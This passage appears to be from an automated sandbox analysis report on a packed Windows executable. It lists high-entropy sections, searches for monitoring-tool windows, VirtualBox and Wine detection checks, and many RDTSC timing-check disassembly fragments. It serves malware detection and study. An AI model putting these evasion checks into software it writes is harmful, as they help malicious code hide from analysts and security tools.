                Source: gJkNLYV0ax.exe | Static PE information: section name:
                Source: gJkNLYV0ax.exe | Static PE information: section name: iyigrnpu
                Source: gJkNLYV0ax.exe | Static PE information: section name: tggmxbsn
                Source: gJkNLYV0ax.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A5BAA0 push cs; retf 0_3_01A5BAAA
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A5BAA0 push cs; retf 0_3_01A5BAAA
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A5CF25 push ss; ret 0_3_01A5CF27
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A5CF25 push ss; ret 0_3_01A5CF27
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_019CCC80 push 146FB1CCh; ret 0_3_019CCC85
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_019CCD14 pushad ; retf 0_3_019CCD15
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_019CC10C pushad ; retf 0_3_019CC10D
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_019CC078 push 336FB1CCh; ret 0_3_019CC07D
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A4E7A6 pushad ; retf 0_3_01A4E7B5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A4E8E4 pushad ; retf 0_3_01A4E8E5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A4EED4 pushad ; retf 0_3_01A4EED5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A5BAA0 push cs; retf 0_3_01A5BAAA
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A5BAA0 push cs; retf 0_3_01A5BAAA
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A5CF25 push ss; ret 0_3_01A5CF27
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A5CF25 push ss; ret 0_3_01A5CF27
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_019F7ABD pushad ; ret 0_3_019F7C75
                Source: gJkNLYV0ax.exe | Static PE information: section name: entropy: 7.981691303814376
                Source: gJkNLYV0ax.exe | Static PE information: section name: iyigrnpu entropy: 7.954353188539169

                Boot Survival

                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: EB83AB second address: EB83B5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6644F246ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: EB83B5 second address: EB7C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 cld 0x0000000a push dword ptr [ebp+122D11F9h] 0x00000010 pushad 0x00000011 mov dword ptr [ebp+122D2DC3h], edi 0x00000017 js 00007F664452DADCh 0x0000001d add ebx, dword ptr [ebp+122D2ACEh] 0x00000023 popad 0x00000024 call dword ptr [ebp+122D1CADh] 0x0000002a pushad 0x0000002b cmc 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f mov di, 7EDBh 0x00000033 mov dword ptr [ebp+122D25D1h], ecx 0x00000039 popad 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e sub dword ptr [ebp+122D25D1h], edi 0x00000044 mov dword ptr [ebp+122D2CF2h], eax 0x0000004a jns 00007F664452DADCh 0x00000050 mov esi, 0000003Ch 0x00000055 jmp 00007F664452DADAh 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e clc 0x0000005f sub dword ptr [ebp+122D1A0Ah], esi 0x00000065 lodsw 0x00000067 stc 0x00000068 pushad 0x00000069 or ebx, dword ptr [ebp+122D2A82h] 0x0000006f jmp 00007F664452DAE4h 0x00000074 popad 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007F664452DADFh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D25D1h], eax 0x00000088 stc 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c je 00007F664452DAD8h 0x00000092 push ebx 0x00000093 pop ebx 0x00000094 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 103C7F7 second address: 103C80C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 103C80C second address: 103C814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 103C814 second address: 103C819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 103C819 second address: 103C81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 103C81F second address: 103C823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 103C959 second address: 103C972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DAE1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 103C972 second address: 103C97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 103C97C second address: 103C98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jne 00007F664452DAD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 1040681 second address: 104071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6644F246F6h 0x0000000b jmp 00007F6644F246EAh 0x00000010 popad 0x00000011 popad 0x00000012 add dword ptr [esp], 6916AC14h 0x00000019 call 00007F6644F246EFh 0x0000001e mov dword ptr [ebp+122D25F4h], ecx 0x00000024 pop ecx 0x00000025 and si, 13FFh 0x0000002a push 00000003h 0x0000002c or edi, 21C40088h 0x00000032 mov edi, dword ptr [ebp+122D2B8Ah] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F6644F246E8h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 sub dword ptr [ebp+122DB572h], edi 0x0000005a push 00000003h 0x0000005c jne 00007F6644F246E6h 0x00000062 call 00007F6644F246E9h 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F6644F246EAh 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 104071A second address: 1040733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DAE5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 1040733 second address: 104079A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6644F246E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jp 00007F6644F2470Fh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jc 00007F6644F246F2h 0x0000001d jp 00007F6644F246ECh 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 jp 00007F6644F246E8h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push edx 0x00000035 pop edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 104079A second address: 10407CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 and cx, 76DBh 0x0000000d lea ebx, dword ptr [ebp+1245C50Dh] 0x00000013 mov edx, esi 0x00000015 xchg eax, ebx 0x00000016 push edi 0x00000017 je 00007F664452DAD8h 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F664452DAE0h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 10407CD second address: 10407D7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6644F246ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 10408C7 second address: 10408E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 pushad 0x00000009 jmp 00007F664452DADDh 0x0000000e jbe 00007F664452DADCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 10408E5 second address: 1040926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F6644F246F3h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jns 00007F6644F246ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6644F246F4h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 1040926 second address: 1040966 instructions: 0x00000000 rdtsc 0x00000002 js 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c or dword ptr [ebp+122D1A0Ah], edi 0x00000012 lea ebx, dword ptr [ebp+1245C516h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F664452DAD8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 1040966 second address: 104096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 104096C second address: 1040971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 10409E8 second address: 10409EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 10409EC second address: 10409F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 10409F6 second address: 10409FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 1040AD6 second address: 1040B02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push ebx 0x0000000d jnl 00007F664452DAD6h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 1040B02 second address: 1040B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007F6644F246F8h 0x00000011 jmp 00007F6644F246F0h 0x00000016 popad 0x00000017 pop eax 0x00000018 jmp 00007F6644F246F1h 0x0000001d lea ebx, dword ptr [ebp+1245C521h] 0x00000023 add dword ptr [ebp+122D2DCAh], ebx 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 1040B5A second address: 1040B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F664452DADBh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 105F164 second address: 105F16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 105F44A second address: 105F44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 105F44E second address: 105F454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | RDTSC instruction interceptor: First address: 105F705 second address: 105F70A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 105F70A second address: 105F710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1056011 second address: 1056048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F664452DAEBh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F664452DAD6h 0x0000001b jc 00007F664452DAD6h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10365FC second address: 1036600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10600DC second address: 10600E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10606A1 second address: 10606A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1060978 second address: 106097D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106097D second address: 1060995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246EFh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1060995 second address: 106099F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F664452DAD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1062FFA second address: 106300C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6644F246ECh 0x0000000c js 00007F6644F246E6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106300C second address: 1063028 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F664452DAD6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10644C5 second address: 10644CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10644CB second address: 10644D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102FA06 second address: 102FA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102FA0C second address: 102FA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106979E second address: 10697C2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6644F246E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F6644F246F3h 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1069BC8 second address: 1069BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1069BCC second address: 1069BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106B24C second address: 106B252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106B252 second address: 106B256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106B256 second address: 106B28C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F664452DADCh 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F664452DADCh 0x00000018 jg 00007F664452DAD6h 0x0000001e jmp 00007F664452DADAh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102C21B second address: 102C221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102C221 second address: 102C225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106ECE4 second address: 106ECEE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6644F246ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106EE2E second address: 106EE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jl 00007F664452DAD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106EE3C second address: 106EE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246ECh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106EE50 second address: 106EE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F664452DAD6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106F277 second address: 106F286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106F3A4 second address: 106F3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DADDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106F3B7 second address: 106F3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6644F246E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 106F3C6 second address: 106F3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1071B5A second address: 1071B70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F6644F246E6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F6644F246E6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1071E57 second address: 1071E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F664452DAD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072071 second address: 1072075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072075 second address: 107208C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jbe 00007F664452DAD6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107208C second address: 1072090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072090 second address: 1072094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072778 second address: 1072794 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6644F246F2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072DBD second address: 1072DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
